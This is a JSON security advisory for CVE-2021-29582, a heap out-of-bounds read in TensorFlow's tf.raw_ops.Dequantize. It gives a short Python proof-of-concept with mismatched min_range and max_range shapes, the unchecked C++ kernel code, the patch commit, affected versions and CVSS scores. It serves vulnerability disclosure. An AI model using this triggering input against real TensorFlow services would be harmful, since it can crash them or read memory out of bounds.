{"id":"GHSA-c45w-2wxr-pp53","summary":"Heap OOB read in `tf.raw_ops.Dequantize`","details":"### Impact\nDue to lack of validation in `tf.raw_ops.Dequantize`, an attacker can trigger a read from outside of bounds of heap allocated data:\n\n```python\nimport tensorflow as tf\n\ninput_tensor=tf.constant(\n  [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\\\n  -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\\\n  -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\\\n  -10, -10, -10, -10], shape=[5, 10], dtype=tf.int32)\ninput_tensor=tf.cast(input_tensor, dtype=tf.quint8)\nmin_range = tf.constant([-10], shape=[1], dtype=tf.float32)\nmax_range = tf.constant([24, 758, 758, 758, 758], shape=[5], dtype=tf.float32)\n  \ntf.raw_ops.Dequantize( \n  input=input_tensor, min_range=min_range, max_range=max_range, mode='SCALED',\n  narrow_range=True, axis=0, dtype=tf.dtypes.float32)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/26003593aa94b1742f34dc22ce88a1e17776a67d/tensorflow/core/kernels/dequantize_op.cc#L106-L131) accesses the `min_range` and `max_range` tensors in parallel but fails to check that they have the same shape:\n\n```cc\nif (num_slices == 1) {\n  const float min_range = input_min_tensor.flat\u003cfloat\u003e()(0);\n  const float max_range = input_max_tensor.flat\u003cfloat\u003e()(0);\n  DequantizeTensor(ctx, input, min_range, max_range, &float_output);\n} else {\n  ...\n  auto min_ranges = input_min_tensor.vec\u003cfloat\u003e();\n  auto max_ranges = input_max_tensor.vec\u003cfloat\u003e();\n  for (int i = 0; i \u003c num_slices; ++i) {\n    DequantizeSlice(ctx-\u003eeigen_device\u003cDevice\u003e(), ctx,\n                    input_tensor.template chip\u003c1\u003e(i), min_ranges(i),\n                    max_ranges(i), output_tensor.template chip\u003c1\u003e(i));\n    ...\n  }\n}\n```\n\n### Patches\nWe have patched the issue in GitHub commit [5899741d0421391ca878da47907b1452f06aaf1b](https://github.com/tensorflow/tensorflow/commit/5899741d0421391ca878da47907b1452f06aaf1b).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","aliases":["BIT-tensorflow-2021-29582","CVE-2021-29582","PYSEC-2021-219","PYSEC-2021-510","PYSEC-2021-708"],"modified":"2026-03-13T22:14:15.407645Z","published":"2021-05-21T14:26:32Z","related":["CVE-2021-29582"],"database_specific":{"nvd_published_at":"2021-05-14T20:15:00Z","github_reviewed_at":"2021-05-18T17:47:11Z","github_reviewed":true,"cwe_ids":["CWE-125"],"severity":"LOW"},"references":[{"type":"WEB","url":"https://github.com/tensorflow/tensorflow/security/advisories/GHSA-c45w-2wxr-pp53"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-29582"},{"type":"WEB","url":"https://github.com/tensorflow/tensorflow/commit/5899741d0421391ca878da47907b1452f06aaf1b"},{"type":"WEB","url":"https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-510.yaml"},{"type":"WEB","url":"https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-708.yaml"},{"type":"WEB","url":"https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-219.yaml"},{"type":"PACKAGE","url":"https://github.com/tensorflow/tensorflow"}],"affected":[{"package":{"name":"tensorflow","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"2.1.4"}]}],"versions":["0.12.0","0.12.1","1.0.0","1.0.1","1.1.0","1.10.0","1.10.1","1.11.0","1.12.0","1.12.2","1.12.3","1.13.1","1.13.2","1.14.0","1.15.0","1.15.2","1.15.3","1.15.4","1.15.5","1.2.0","1.2.1","1.3.0","1.4.0","1.4.1","1.5.0","1.5.1","1.6.0","1.7.0","1.7.1","1.8.0","1.9.0","2.0.0","2.0.1","2.0.2","2.0.3","2.0.4","2.1.0","2.1.1","2.1.2","2.1.3"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.2.0"},{"fixed":"2.2.3"}]}],"versions":["2.2.0","2.2.1","2.2.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.3.0"},{"fixed":"2.3.3"}]}],"versions":["2.3.0","2.3.1","2.3.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.4.0"},{"fixed":"2.4.2"}]}],"versions":["2.4.0","2.4.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-cpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-cpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"2.1.4"}]}],"versions":["1.15.0","2.1.0","2.1.1","2.1.2","2.1.3"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-cpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-cpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.2.0"},{"fixed":"2.2.3"}]}],"versions":["2.2.0","2.2.1","2.2.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-cpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-cpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.3.0"},{"fixed":"2.3.3"}]}],"versions":["2.3.0","2.3.1","2.3.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-cpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-cpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.4.0"},{"fixed":"2.4.2"}]}],"versions":["2.4.0","2.4.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-gpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-gpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"2.1.4"}]}],"versions":["0.12.0","0.12.1","1.0.0","1.0.1","1.1.0","1.10.0","1.10.1","1.11.0","1.12.0","1.12.2","1.12.3","1.13.1","1.13.2","1.14.0","1.15.0","1.15.2","1.15.3","1.15.4","1.15.5","1.2.0","1.2.1","1.3.0","1.4.0","1.4.1","1.5.0","1.5.1","1.6.0","1.7.0","1.7.1","1.8.0","1.9.0","2.0.0","2.0.1","2.0.2","2.0.3","2.0.4","2.1.0","2.1.1","2.1.2","2.1.3"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-gpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-gpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.2.0"},{"fixed":"2.2.3"}]}],"versions":["2.2.0","2.2.1","2.2.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-gpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-gpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.3.0"},{"fixed":"2.3.3"}]}],"versions":["2.3.0","2.3.1","2.3.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-gpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-gpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.4.0"},{"fixed":"2.4.2"}]}],"versions":["2.4.0","2.4.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"type":"CVSS_V4","score":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"}]}